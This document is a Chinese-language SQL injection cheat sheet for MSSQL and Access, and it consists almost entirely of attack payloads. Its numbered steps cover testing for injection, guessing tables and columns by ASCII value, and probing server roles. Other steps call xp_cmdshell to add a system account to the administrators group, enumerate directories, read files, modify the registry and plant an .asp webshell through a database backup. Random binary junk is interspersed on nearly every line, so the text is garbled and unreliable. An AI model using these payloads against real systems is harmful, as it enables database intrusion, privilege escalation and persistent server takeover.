1.判断是否有注入;and 1=1 ;and 1=2 ER0B��{b��
2.初步判断是否是mssql ;and user>0 ��}
����|�
<
pZ�w�M��
3.注入参数是字符'and [查询条件] and ''=' � s;-A�Zr)
�lX�"6m}~D
4.搜索时没过滤参数的'and [查询条件] and '%25'=' P~%+K�xwZQ
&�0�xM �2J
5.判断数据库系统 "uFws�jz&B
��dg_w��$#
;and (select count(*) from sysobjects)>0 mssql 'c# }^�@G�
U>��DCra�;
;and (select count(*) from msysobjects)>0 access F6�aC'<#/�
KtG�bpcS$f
!;0�K=~(Y^
�r�R
�8�6D
6.猜数据库 ;and (select Count(*) from [数据库名])>0 1xInU_�SPf
#/{3qPN�?@
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 �� �K���~B
=}��.gU WV
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 P�>�(F��CX
Ih�OAMH��1
9.(1)猜字段的ascii值(access) ?:�G 3U�\M
8�|z�Ogn�{
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 c3r`�T{�Kf
ARE��jS�$
(2)猜字段的ascii值(mssql) /aIGq/;Y+a
]s�J�C%�/
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 bk�S"]q�)>
'u~0rMe4})
10.测试权限结构(mssql) jcb&h@T8kv
B�9�Hib1<8
O8��SE)�R~
_
j`tR��:�
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- �V1~@��� �
��m x�q��Y
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- <'N�:K@Cs
</u=<^i�re
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- *QV"�o{V��
p4
=�/rk�q
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- ,V��w>3|�C
hS&l4 \I'Z
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- �ncM�z�Hw
�&}
{ �#g�
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- �um}q�@�BU
&�B�Ra5`��
;and 1=(select IS_MEMBER('db_owner'));-- iaLZ|\�`3a
�Pj�H'5�Y�
�8�g
Z�)c\
@5ud{"|�2�
11.添加mssql和系统的帐户 2`�TV(U��@
1GqSY|FSGp
;exec master.dbo.sp_addlogin username;-- Ka_;~LS>(�
;exec master.dbo.sp_password null,username,password;-- P=�_�fYA3
�/K��NDo^P
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- ^�\&Fo�wpP
om�2N*W.gk
;exec master.dbo.xp_cmdshell 'net user username password :��mW<
E��
bzx�f*b1I�
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- I��7~) q�`
P%��g�A`�j
;exec master.dbo.xp_cmdshell 'net user username password /add';-- EO~L�.E%W�
�b�wH[rT!n
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- WTJ�{�M$�
~UZ3 �lN\E
&*�%x�]fQ@
^
nI2<�P��
12.(1)遍历目录 "r*�`*���1
Q;g�7<w1�7
;create table dirs(paths varchar(100), id int) I�Wq#W(yM
�&�N._}�ts
;insert dirs exec master.dbo.xp_dirtree 'c:\' JO��+tY�[q
�&T~X`{V]`
;and (select top 1 paths from dirs)>0 � @O��koT:
EK V�cz�'w
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) 0%dOi�
�ko
Kk6=�61}�A
�bd~m'cob>
v"W�*@7<`S
(2)遍历目录 ����"~�^0�
ir��/uHN@�
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- �`Z8k#z'bN
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 <|jh�3Hlp�
<�r.QS[�:h
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 o�wQ,o�p�#
��cw�{�TS
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 oJ\g0|\qwe
_�p�*�8�ke
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 6{Q-]LOc[.
�[&P�F ;)i
�b&mA1w[W]
#�Pp:�H/�b
13.mssql中的存储过程 3ie
k�>�'T
RYjK4xT?Y/
xp_regenumvalues 注册表根键, 子键 �h]s�~w���
eNK[�P=�-
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 oV��0T�
�
9K/Ete�S��
xp_regread 根键,子键,键值名 � 2Y2�3!hw
�[I�3��Nu8
;exec xp_regread 5dI=;L�>D�
V�<��W;[#"
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 �x��dg��Au
�<��Q�\�KS
xp_regwrite 根键,子键, 值名, 值类型, 值 vxj:Y��'�}
4,z|hY_*t�
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 VM�Rf�DaO9
!>n!Q*\(Ov
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 b4�i=%]v�8
XPO-u]<�W
xp_regdeletevalue 根键,子键,值名 �6]Hwr_/tk
45�sEhs[�$
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 Cqlx�E�/�|
�Y?�NL|cW4
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 9hfg/3t('�
=g9n =spAn
h�m! ���J@
C��$TU
T�S
14.mssql的backup创建webshell ��ou��<3}g
:5,~CtF5 `
use model y>aO90w�J�
1�>j,v��+�
create table cmd(str image); *k6�2�Q�z3
u,��So�+%�
insert into cmd(str) values (''); B_Q{B|eEt&
)|x�u5��.F
backup database model to disk='c:\l.asp'; � 4d5�c�]%
aC\f;&P�>�
z�&amYwQcI
6r��<��a��
15.mssql内置函数 �X$w�e\t�
#�dUKG8-HJ
;and (select @@version)>0 获得Windows的版本号 {MUi�K�5:�
gHBv���Q1g
;and user_name()='dbo' 判断当前系统的连接用户是不是sa :�^3�)�[.m
S�>�~f.��
;and (select user_name())>0 爆当前系统的连接用户 �(�4��cdkL
.R�k8qR�B
;and (select db_name())>0 得到当前连接的数据库 �.��cHgYHa
k
i<�X��^^
9f( X7k��t
UrizZ���5a
16.简洁的webshell �0]|`*f&p;
m7'�<k1#"Y
use model UJ�I2L-;Ul
6M�T�
(k:
create table cmd(str image); ��M��F�4�(
B@&sG
�5ES
insert into cmd(str) values (''); W/!�P�1M n
d��j�Ojd,�
backup database model to disk='g:\wwwtest\l.asp';
